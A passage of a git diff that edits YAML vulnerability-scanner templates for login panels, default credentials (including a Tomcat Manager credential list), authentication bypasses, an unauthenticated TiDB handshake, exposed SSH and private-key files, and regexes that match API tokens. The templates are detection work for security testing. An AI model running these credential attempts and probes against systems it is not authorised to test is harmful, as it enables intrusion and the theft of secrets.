word words: - "smartsenseId" + - type: status status: - 200 -# Enhanced by mp on 2022/03/10 +# digest: 4a0a004730450221008b7310d0ce26ecd9fffe8991ba01f96ae300acf8002c75a28347f40c94ed5a6802202e17996a4e4e1483ed8f58408f3a8b448c315aa8c380d084c0f6c88fbbb22b64:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/smartsense-default-login-10331.yaml b/poc/auth/smartsense-default-login-10331.yaml index 88bc61e7b6..e6c7dc5e8c 100644 --- a/poc/auth/smartsense-default-login-10331.yaml +++ b/poc/auth/smartsense-default-login-10331.yaml @@ -3,14 +3,9 @@ info: name: HortonWorks SmartSense Default Login author: Techryptic (@Tech) severity: high - description: HortonWorks SmartSense default admin login information was detected. + description: Default Login of admin:admin on HortonWorks SmartSense application. reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html tags: hortonworks,smartsense,default-login - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: - | @@ -35,5 +30,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/solar-log-authbypass-10352.yaml b/poc/auth/solar-log-authbypass-10352.yaml deleted file mode 100644 index 6b4d906250..0000000000 --- a/poc/auth/solar-log-authbypass-10352.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: solar-log-authbypass - -info: - name: Solar-Log 500 2.8.2 - Incorrect Access Control - author: geeknik - severity: high - description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server. - reference: - - https://www.exploit-db.com/exploits/49986 - classification: - cwe-id: CWE-284 - metadata: - max-request: 1 - tags: solarlog,auth-bypass,edb - -http: - - method: GET - path: - - "{{BaseURL}}/lan.html" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "IPC@CHIP" - - - type: word - part: body - words: - - " Solare Datensysteme GmbH" - - "mailto:info@solar-log.com" - condition: and - -# digest: 4a0a00473045022100befc1d4bf898609aed2567951ef9d96923407a7ac74979b6969d38b7e0d2295702200e9232cb6c80aebd34b60aa9dc6af19437484593d9a84e0af8b06fbd584053d4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/solar-log-authbypass.yaml b/poc/auth/solar-log-authbypass.yaml new file mode 100644 index 0000000000..9e66b4dc51 --- /dev/null +++ b/poc/auth/solar-log-authbypass.yaml @@ -0,0 +1,27 @@ +id: solar-log-authbypass +info: + name: Solar-Log 500 2.8.2 - Incorrect Access Control + author: geeknik + severity: high + description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server + reference: https://www.exploit-db.com/exploits/49986 + tags: solarlog,auth-bypass +requests: + - method: GET + path: + - "{{BaseURL}}/lan.html" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - "IPC@CHIP" + - type: word + part: body + words: + - " Solare Datensysteme GmbH" + - "mailto:info@solar-log.com" + condition: and diff --git a/poc/auth/solarwinds-default-login-10355.yaml b/poc/auth/solarwinds-default-login-10355.yaml deleted file mode 100644 index ea489ae260..0000000000 --- a/poc/auth/solarwinds-default-login-10355.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: solarwinds-default-admin -info: - name: SolarWinds Orion Default Login - author: dwisiswant0 - severity: high - description: SolarWinds Orion default admin credentials were discovered. - reference: - - https://github.com/solarwinds/OrionSDK/wiki/REST - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: solarwinds,default-login -# Optional: -# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 -# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} -requests: - - raw: - - | - GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - - | - GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username)}} - payloads: - username: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - "Content-Type: application/json" - part: header - - type: regex - regex: - - "(totalRow|result|swi)s(:\\/\\/)?" - - "(Orion\\.|Poller(ID)?)s?" - condition: and - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/solarwinds-default-login-10356.yaml b/poc/auth/solarwinds-default-login-10356.yaml index 94fa5c0a3c..ea489ae260 100644 --- a/poc/auth/solarwinds-default-login-10356.yaml +++ b/poc/auth/solarwinds-default-login-10356.yaml @@ -3,11 +3,17 @@ info: name: SolarWinds Orion Default Login author: dwisiswant0 severity: high + description: SolarWinds Orion default admin credentials were discovered. + reference: + - https://github.com/solarwinds/OrionSDK/wiki/REST + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: solarwinds,default-login - reference: https://github.com/solarwinds/OrionSDK/wiki/REST - # Optional: - # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 - # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} +# Optional: +# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 +# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} requests: - raw: - | @@ -37,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/somfy-login-10371.yaml b/poc/auth/somfy-login-10371.yaml new file mode 100644 index 0000000000..2a3d4c40d1 --- /dev/null +++ b/poc/auth/somfy-login-10371.yaml @@ -0,0 +1,18 @@ +id: somfy-login +info: + name: Somfy Login Page + author: DhiyaneshDK + severity: info + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/m_login.htm' + matchers-condition: and + matchers: + - type: word + words: + - Home motion by Somfy + - type: status + status: + - 200 diff --git a/poc/auth/somfy-login-10373.yaml b/poc/auth/somfy-login-10373.yaml deleted file mode 100644 index 4a22eded46..0000000000 --- a/poc/auth/somfy-login-10373.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: somfy-login -info: - name: Somfy Login Page - author: DhiyaneshDK - severity: info - tags: panel,login -requests: - - method: GET - path: - - '{{BaseURL}}/m_login.htm' - matchers-condition: and - matchers: - - type: word - words: - - Home motion by Somfy - - type: status - status: - - 200 diff --git a/poc/auth/sonarqube-token-10380.yaml b/poc/auth/sonarqube-token-10380.yaml deleted file mode 100644 index ceac80589a..0000000000 --- a/poc/auth/sonarqube-token-10380.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: sonarqube-token -info: - name: SonarQube Token Disclosure - author: Ice3man - severity: info - tags: exposure,token -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" diff --git a/poc/auth/sonarqube-token-10382.yaml b/poc/auth/sonarqube-token-10382.yaml index 994d036f12..7fe08cc8f9 100644 --- a/poc/auth/sonarqube-token-10382.yaml +++ b/poc/auth/sonarqube-token-10382.yaml @@ -1,22 +1,15 @@ id: sonarqube-token - info: name: SonarQube Token Disclosure author: Ice3man severity: info - metadata: - max-request: 1 tags: exposure,token,sonarqube - -http: +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" - -# digest: 4a0a0047304502204b7b6bb1ff958d322155673133a99b081ed1c61bd8afb5e1d0f249849b9badc6022100efbd2cb1fd9179a7c9a30daac8033d293490f30b28af36dadb2107ddd9d6e604:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/spark-webui-unauth-10401.yaml b/poc/auth/spark-webui-unauth-10401.yaml new file mode 100644 index 0000000000..6ca1120cb0 --- /dev/null +++ b/poc/auth/spark-webui-unauth-10401.yaml @@ -0,0 +1,26 @@ +id: spark-webui-unauth + +info: + name: Unauthenticated Spark WebUI + author: princechaddha + severity: medium + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Spark Master at spark://" + - "<strong>URL:</strong>" + part: body + condition: and diff --git a/poc/auth/spark-webui-unauth.yaml b/poc/auth/spark-webui-unauth.yaml index 31a45c9631..a917ae6951 100644 --- a/poc/auth/spark-webui-unauth.yaml +++ b/poc/auth/spark-webui-unauth.yaml @@ -1,31 +1,22 @@ id: spark-webui-unauth - info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: - - https://github.com/vulhub/vulhub/tree/master/spark/unacc - metadata: - max-request: 1 - tags: unauth,vulhub,spark - -http: + reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "<title>Spark Master at spark://" - "<strong>URL:</strong>" part: body condition: and - -# digest: 4a0a004730450220270869b1b7fd1729ea28140dbf8a434ca5b2b341dd040852601e1b37cd1e8499022100942b17a3cf90e2d877e8ffed244ff81baa455305d50bfbf4e5c9f90ad08771e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sphider-login-10407.yaml b/poc/auth/sphider-login-10407.yaml deleted file mode 100644 index f9ac4a5606..0000000000 --- a/poc/auth/sphider-login-10407.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: sphider-login -info: - name: Sphider Admin Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6641 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/admin/spider.php' - - '{{BaseURL}}/sphider/admin/admin.php' - - '{{BaseURL}}/search/admin/admin.php' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - '<title>Sphider Admin Login' - - type: status - status: - - 200 diff --git a/poc/auth/sphider-login-10408.yaml b/poc/auth/sphider-login-10408.yaml index 59e7e8b72e..becae53fbd 100644 --- a/poc/auth/sphider-login-10408.yaml +++ b/poc/auth/sphider-login-10408.yaml @@ -3,7 +3,8 @@ info: name: Sphider Admin Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6641 + reference: + - https://www.exploit-db.com/ghdb/6641 tags: panel requests: - method: GET @@ -11,6 +12,7 @@ requests: - '{{BaseURL}}/admin/spider.php' - '{{BaseURL}}/sphider/admin/admin.php' - '{{BaseURL}}/search/admin/admin.php' + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/poc/auth/sphider-login-10409.yaml b/poc/auth/sphider-login-10409.yaml new file mode 100644 index 0000000000..59e7e8b72e --- /dev/null +++ b/poc/auth/sphider-login-10409.yaml @@ -0,0 +1,21 @@ +id: sphider-login +info: + name: Sphider Admin Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6641 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/admin/spider.php' + - '{{BaseURL}}/sphider/admin/admin.php' + - '{{BaseURL}}/search/admin/admin.php' + matchers-condition: and + matchers: + - type: word + words: + - 'Sphider Admin Login' + - type: status + status: + - 200 diff --git a/poc/auth/sphider-login.yaml b/poc/auth/sphider-login.yaml index 4745def5b6..f9ac4a5606 100644 --- a/poc/auth/sphider-login.yaml +++ b/poc/auth/sphider-login.yaml @@ -1,37 +1,22 @@ id: sphider-login - info: - name: Sphider Admin Login Panel - Detect + name: Sphider Admin Login author: dhiyaneshDK severity: info - description: Sphider admin login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6641 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 3 - tags: edb,panel - -http: + reference: https://www.exploit-db.com/ghdb/6641 + tags: panel +requests: - method: GET path: - '{{BaseURL}}/admin/spider.php' - '{{BaseURL}}/sphider/admin/admin.php' - '{{BaseURL}}/search/admin/admin.php' - stop-at-first-match: true - matchers-condition: and matchers: - type: word words: - 'Sphider Admin Login' - - type: status status: - 200 - -# digest: 4a0a004730450220189d990c7ed8618187a0925397f404775be07d3ca9d4d2be91643fdf0321a6d6022100c42cb786ca05f7be0ce6361bdb70299b93507de5f713637a2cae52fc639779ca:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/splunk-enterprise-login-panel.yaml b/poc/auth/splunk-enterprise-login-panel.yaml index 49a90394ee..af5162d861 100644 --- a/poc/auth/splunk-enterprise-login-panel.yaml +++ b/poc/auth/splunk-enterprise-login-panel.yaml @@ -1,31 +1,22 @@ id: splunk-enterprise-panel + info: - name: Splunk Enterprise Panel Detect + name: Splunk Enterprise Panel author: praetorian-thendrickson severity: info - reference: - - https://www.splunk.com/en_us/software/splunk-enterprise.html - metadata: - shodan-query: http.title:"Login - Splunk" + reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22 tags: panel,splunk + requests: - method: GET path: - '{{BaseURL}}/en-US/account/login' redirects: true + matchers-condition: and matchers: - type: word words: - 'Splunk Inc.' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '"version": "(.*)"' - - 'versionNumber": "([0-9.]+)"' - - '"VERSION_LABEL": "([0-9.]+)"' + - 'splunkd' + - 'Splunk Enterprise' diff --git a/poc/auth/splunk-enterprise-login-panel.yml b/poc/auth/splunk-enterprise-login-panel.yml deleted file mode 100644 index af5162d861..0000000000 --- a/poc/auth/splunk-enterprise-login-panel.yml +++ /dev/null @@ -1,22 +0,0 @@ -id: splunk-enterprise-panel - -info: - name: Splunk Enterprise Panel - author: praetorian-thendrickson - severity: info - reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22 - tags: panel,splunk - -requests: - - method: GET - path: - - '{{BaseURL}}/en-US/account/login' - redirects: true - - matchers-condition: and - matchers: - - type: word - words: - - 'Splunk Inc.' - - 'splunkd' - - 'Splunk Enterprise' diff --git a/poc/auth/splunk-login-10416.yaml b/poc/auth/splunk-login-10416.yaml new file mode 100644 index 0000000000..ccfbcaee47 --- /dev/null +++ b/poc/auth/splunk-login-10416.yaml @@ -0,0 +1,24 @@ +id: splunk-login + +info: + name: Splunk SOAR + author: dhiyaneshDK + severity: info + metadata: + shodan-query: http.title:"Splunk SOAR" + tags: panel,splunk + +requests: + - method: GET + path: + - '{{BaseURL}}/login?next=/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Splunk SOAR' + + - type: status + status: + - 200 diff --git a/poc/auth/square-access-token(1).yaml b/poc/auth/square-access-token(1).yaml deleted file mode 100644 index 5601c992e7..0000000000 --- a/poc/auth/square-access-token(1).yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: square-access-token - -info: - name: Square Access Token - author: gaurang,daffainfo - severity: high - tags: token,file,square - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "EAAAE[a-zA-Z0-9_-]{59}" - - "sq0atp-[0-9A-Za-z\\-_]{22}" diff --git a/poc/auth/square-access-token-11867.yaml b/poc/auth/square-access-token-11867.yaml new file mode 100644 index 0000000000..e0a5d2d1d0 --- /dev/null +++ b/poc/auth/square-access-token-11867.yaml @@ -0,0 +1,14 @@ +id: square-access-token +info: + name: Square Access Token + author: gaurang,daffainfo + severity: high + tags: token,file,square +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "EAAAE[a-zA-Z0-9_-]{59}" + - "sq0atp-[0-9A-Za-z\\-_]{22}" diff --git a/poc/auth/square-access-token.yaml b/poc/auth/square-access-token.yaml index e0a5d2d1d0..5601c992e7 100644 --- a/poc/auth/square-access-token.yaml +++ b/poc/auth/square-access-token.yaml @@ -1,12 +1,15 @@ id: square-access-token + info: name: Square Access Token author: gaurang,daffainfo severity: high tags: token,file,square + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/auth/ssh-authorized-keys-10523.yaml b/poc/auth/ssh-authorized-keys-10523.yaml index 8cadf9c3e6..3ae41746b1 100644 --- a/poc/auth/ssh-authorized-keys-10523.yaml +++ b/poc/auth/ssh-authorized-keys-10523.yaml @@ -1,15 +1,26 @@ id: ssh-authorized-keys + info: - name: SSH Authorized Keys + name: SSH Authorized Keys File - Detect author: geeknik - reference: https://www.ssh.com/academy/ssh/authorized-key - severity: low + severity: medium + description: SSH authorized keys file was detected. + reference: + - https://www.ssh.com/academy/ssh/authorized-key + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 2 tags: config,exposure,ssh -requests: + +http: - method: GET path: - "{{BaseURL}}/.ssh/authorized_keys" - "{{BaseURL}}/_/.ssh/authorized_keys" + matchers-condition: and matchers: - type: word @@ -19,6 +30,9 @@ requests: - "ssh-rsa" - "ecdsa-sha2-nistp256" condition: or + - type: status status: - 200 + +# digest: 4b0a00483046022100ef061bf288841527c39730c3a04580cbcbe3c87e6037aaea3a4d70395670f44902210081cd1eea8fb47d9d7f0c76354181e3682b607af69b9cda401e1081704366c31c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/stem-audio-table-private-keys-10535.yaml b/poc/auth/stem-audio-table-private-keys-10535.yaml new file mode 100644 index 0000000000..ffef41a49a --- /dev/null +++ b/poc/auth/stem-audio-table-private-keys-10535.yaml @@ -0,0 +1,22 @@ +id: stem-audio-table-private-keys +info: + name: Detect Private Key on STEM Audio Table + author: gy741 + severity: high + reference: https://blog.grimm-co.com/2021/06/the-walls-have-ears.html + tags: stem,config,exposure,iot +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/privatekey.pem" + matchers-condition: and + matchers: + - type: word + words: + - "BEGIN RSA PRIVATE KEY" + - type: status + status: + - 200 + - type: dsl + dsl: + - '!contains(tolower(body), "' + matchers-condition: and matchers: - type: word @@ -42,10 +48,12 @@ requests: - 'Redirecting...' - '

Redirecting...' + - type: word part: header words: - 'session' + - type: status status: - 302 diff --git a/poc/auth/symantec-dlp-login-10596.yaml b/poc/auth/symantec-dlp-login-10596.yaml deleted file mode 100644 index 688e47b4ab..0000000000 --- a/poc/auth/symantec-dlp-login-10596.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: symantec-dlp-login -info: - name: Symantec Data Loss Prevention - author: princechaddha - severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22 - tags: symantec,panel,login -requests: - - method: GET - path: - - '{{BaseURL}}/ProtectManager/Logon' - matchers-condition: and - matchers: - - type: word - words: - - "Symantec Data Loss Prevention" - part: body - - type: status - status: - - 200 diff --git a/poc/auth/symantec-epm-login-10601.yaml b/poc/auth/symantec-epm-login-10599.yaml similarity index 100% rename from poc/auth/symantec-epm-login-10601.yaml rename to poc/auth/symantec-epm-login-10599.yaml diff --git a/poc/auth/symantec-ewep-login-10605.yaml b/poc/auth/symantec-ewep-login-10605.yaml index ba70fd514b..2427730b89 100644 --- a/poc/auth/symantec-ewep-login-10605.yaml +++ b/poc/auth/symantec-ewep-login-10605.yaml @@ -1,25 +1,20 @@ id: symantec-ewep-login - info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 tags: panel,symantec,login - requests: - method: GET path: - "{{BaseURL}}/b/l.e" - matchers-condition: and matchers: - type: word words: - "Symantec Encryption Server: Web Email Protection - Login" part: body - - type: status status: - 200 diff --git a/poc/auth/symantec-ewep-login-10606.yaml b/poc/auth/symantec-ewep-login-10606.yaml index 2427730b89..835a5f9663 100644 --- a/poc/auth/symantec-ewep-login-10606.yaml +++ b/poc/auth/symantec-ewep-login-10606.yaml @@ -3,7 +3,8 @@ info: name: Symantec Encryption Web Email Protection author: johnk3r severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 + metadata: + shodan-query: http.title:"Symantec Encryption Server" tags: panel,symantec,login requests: - method: GET diff --git a/poc/auth/szhe-default-login-10636.yaml b/poc/auth/szhe-default-login-10636.yaml index 64f4525692..261f6d9060 100644 --- a/poc/auth/szhe-default-login-10636.yaml +++ b/poc/auth/szhe-default-login-10636.yaml @@ -2,10 +2,16 @@ id: szhe-default-login info: name: Szhe Default Login author: pikpikcu - severity: low + description: Szhe default login information was discovered. + severity: medium tags: szhe,default-login reference: - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -32,3 +38,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/szhe-default-login.yaml b/poc/auth/szhe-default-login-10638.yaml similarity index 100% rename from poc/auth/szhe-default-login.yaml rename to poc/auth/szhe-default-login-10638.yaml diff --git a/poc/auth/telecom-gateway-default-login-10686.yaml b/poc/auth/telecom-gateway-default-login-10686.yaml index 73abc6eada..08f2ecd266 100644 --- a/poc/auth/telecom-gateway-default-login-10686.yaml +++ b/poc/auth/telecom-gateway-default-login-10686.yaml @@ -1,15 +1,12 @@ id: telecom-gateway-default-login info: - name: Telecom Gateway - Default Admin Login + name: Telecom Gateway Default Login author: ritikchaddha severity: high - description: Telecom Gateway default admin login credentials were successful. - metadata: - max-request: 1 - tags: default-login,telecom,gateway + tags: telecom,default-login,gateway -http: +requests: - raw: - | POST /manager/login.php HTTP/1.1 @@ -23,9 +20,8 @@ http: - admin password: - admin - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word @@ -39,5 +35,3 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a367ccbfabd23210af96b3439c4ba6cbe08f9800ae62553ccd130828136642480220114c4652ae60ed84e6ae4c520992c75d8e25f826fd02f172fcc9e416309fe566:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/telecom-gateway-default-login.yaml b/poc/auth/telecom-gateway-default-login.yaml new file mode 100644 index 0000000000..d0730e1ba5 --- /dev/null +++ b/poc/auth/telecom-gateway-default-login.yaml @@ -0,0 +1,33 @@ +id: telecom-gateway-default-login +info: + name: Telecom Gateway Default Login + author: ritikchaddha + severity: high + tags: telecom,default-login,gateway +requests: + - raw: + - | + POST /manager/login.php HTTP/1.1 + Host: {{Hostname}} + + Name={{username}}&Pass={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "电信网关服务器管理后台" + - "index-shang.php" + - "di.php" + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/tidb-unauth-10770.yaml b/poc/auth/tidb-unauth-10770.yaml new file mode 100644 index 0000000000..c4c6a133b8 --- /dev/null +++ b/poc/auth/tidb-unauth-10770.yaml @@ -0,0 +1,23 @@ +id: tidb-unauth +info: + name: Unauth TiDB Disclosure + author: lu4nx + severity: high + metadata: + zoomeye-dork: tidb +port:"4000" + tags: network,tidb,unauth +network: + - inputs: + - read: 1024 # skip handshake packet + - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication + type: hex + host: + - "{{Hostname}}" + - "{{Host}}:4000" + read-size: 1024 + matchers: + - type: binary + binary: + # resp format: + # 07: length, 02: sequence number, 00: success + - "0700000200000002000000" diff --git a/poc/auth/tidb-unauth-10772.yaml b/poc/auth/tidb-unauth-10772.yaml deleted file mode 100644 index 8121309890..0000000000 --- a/poc/auth/tidb-unauth-10772.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: tidb-unauth -info: - name: TiDB - Unauthenticated Access - author: lu4nx - severity: high - description: TiDB server was able to be accessed because no authentication was required. - metadata: - zoomeye-dork: tidb +port:"4000" - tags: network,tidb,unauth -network: - - inputs: - - read: 1024 # skip handshake packet - - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication - type: hex - host: - - "{{Hostname}}" - - "{{Host}}:4000" - read-size: 1024 - matchers: - - type: binary - binary: - # resp format: - # 07: length, 02: sequence number, 00: success - - "0700000200000002000000" - -# Enhanced by mp on 2022/07/20 diff --git a/poc/auth/tomcat-default-login-10791.yaml b/poc/auth/tomcat-default-login-10791.yaml index 4e522c9229..514e77dbe1 100644 --- a/poc/auth/tomcat-default-login-10791.yaml +++ b/poc/auth/tomcat-default-login-10791.yaml @@ -1,6 +1,6 @@ id: tomcat-default-login info: - name: ApahceTomcat Manager Default Login + name: Apache Tomcat Manager Default Login author: pdteam severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. diff --git a/poc/auth/tomcat-default-login.yaml b/poc/auth/tomcat-default-login.yaml new file mode 100644 index 0000000000..662fd6f3ac --- /dev/null +++ b/poc/auth/tomcat-default-login.yaml @@ -0,0 +1,76 @@ +id: tomcat-default-login + +info: + name: Apache Tomcat Manager Default Login + author: pdteam + severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. + reference: + - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ + tags: tomcat,apache,default-login + +requests: + - raw: + - | + GET /manager/html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - tomcat + - admin + - ovwebusr + - j2deployer + - cxsdk + - ADMIN + - xampp + - tomcat + - QCC + - admin + - root + - role1 + - role + - tomcat + - admin + - role1 + - both + - admin + + password: + - tomcat + - admin + - OvW*busr1 + - j2deployer + - kdsxc + - ADMIN + - xampp + - s3cret + - QLogic66 + - tomcat + - root + - role1 + - changethis + - changethis + - j5Brn9 + - tomcat + - tomcat + - 123456 + + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/tracer-sc-login.yaml b/poc/auth/tracer-sc-login.yaml index 41c01692f2..ebe33fde3a 100644 --- a/poc/auth/tracer-sc-login.yaml +++ b/poc/auth/tracer-sc-login.yaml @@ -1,23 +1,38 @@ id: tracer-sc-login + info: - name: Tracer SC login panel + name: Tracer SC Login Panel - Detect author: geeknik severity: info - reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html + description: Tracer SC login panel was detected. + reference: + - https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: tracer,trane,iot,panel,login -requests: + +http: - method: GET path: - "{{BaseURL}}/hui/index.html" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Tracer SC" + - type: word part: header words: - "text/html" + +# digest: 490a004630440220586e31fea6c6370b8cdbbfedfd72de8617dd9df5dec16bd17631e3ffb4cc4f380220365b54fb1158abdf005462f86436a7f98171342b816a494be549d6fd2efba4a5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/twitter-secret-10862.yaml b/poc/auth/twitter-secret-10862.yaml index 713cfd3069..824660405a 100644 --- a/poc/auth/twitter-secret-10862.yaml +++ b/poc/auth/twitter-secret-10862.yaml @@ -1,7 +1,7 @@ id: twitter-secret info: name: Twitter Secret - author: gaurang + author: gaurang,daffainfo severity: medium tags: token,file,twitter file: @@ -11,3 +11,4 @@ file: - type: regex regex: - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" + - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" diff --git a/poc/auth/twitter-secret.yaml b/poc/auth/twitter-secret.yaml index 824660405a..0a89da00fa 100644 --- a/poc/auth/twitter-secret.yaml +++ b/poc/auth/twitter-secret.yaml @@ -1,4 +1,5 @@ id: twitter-secret + info: name: Twitter Secret author: gaurang,daffainfo @@ -7,8 +8,11 @@ info: file: - extensions: - all + extractors: - type: regex regex: - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" - 